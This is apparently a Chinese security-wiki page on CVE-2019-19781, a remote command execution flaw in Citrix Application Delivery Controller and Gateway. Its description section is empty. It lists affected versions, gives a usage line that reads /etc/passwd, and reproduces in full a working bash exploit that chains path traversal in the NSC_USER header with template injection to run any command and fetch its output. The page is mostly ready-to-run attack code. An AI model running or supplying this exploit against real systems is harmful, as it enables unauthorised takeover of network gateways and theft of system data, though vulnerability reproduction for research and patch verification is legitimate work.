menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right (CVE-2019-19781)Citrix 远程命令执行漏洞 chevron_right (CVE-2019-19781)Citrix 远程命令执行漏洞.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    (CVE-2019-19781)Citrix 远程命令执行漏洞.md
    2.26 KB / 2021-07-15 19:49:24
        (CVE-2019-19781)Citrix 远程命令执行漏洞
    =========================================
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    13.x,12.1,12.0,11.1,10.5
    
    三、复现过程
    ------------
    
        bash CVE-2019-19781.sh www.0-sec.org 'cat /etc/passwd'
    
    1.png
    
        CVE-2019-19781.sh
        #!/bin/bash
        # Remote Code Execution Exploit for Citrix Application Delivery Controller and Citrix Gateway - CVE-2019-19781
        # Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE e.g : bash CVE-2019-19781.sh XX.XX.XX.XX 'uname -a'
        # Release Date : 11/01/2020
        # Follow Us : https://twitter.com/ProjectZeroIN / https://github.com/projectzeroindia
        echo "=================================================================================
         ___             _           _     ____                 ___           _  _
        | _ \ _ _  ___  (_) ___  __ | |_  |_  / ___  _ _  ___  |_ _| _ _   __| |(_) __ _
        |  _/| '_|/ _ \ | |/ -_)/ _||  _|  / / / -_)| '_|/ _ \  | | | ' \ / _' || |/ _' |
        |_|  |_|  \___/_/ |\___|\__| \__| /___|\___||_|  \___/ |___||_||_|\__,_||_|\__,_|
                      |__/                                                 CVE-2019-19781
        ================================================================================="
        ##############################
        if [ -z "$1" ];
        then
        echo -ne 'Usage : bash CVE-2019-19781.sh IP_OF_VULNURABLE_HOST COMMAND_TO_EXECUTE\n'
        exit;
        fi
        export LC_CTYPE=C
        filenameid=$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 32 | head -n 1);
        curl -s -k "https://$1/vpn/../vpns/portal/scripts/newbm.pl" -d "url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'$2 | tee /netscaler/portal/templates/$filenameid.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb" -H "NSC_USER: /../../../../../../../../../../netscaler/portal/templates/$filenameid" -H 'NSC_NONCE: test1337' -H 'Content-type: application/x-www-form-urlencoded' --path-as-is
        echo -ne "\n" ;curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -s -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
        echo -ne "Command Output :\n"
        curl -m 3 -k "https://$1/vpn/../vpns/portal/$filenameid.xml" -H "NSC_NONCE: pwnpzi1337" -H "NSC_USER: pwnpzi1337" --path-as-is
        © 2020 GitHub, Inc.
    
    
    links
    file_download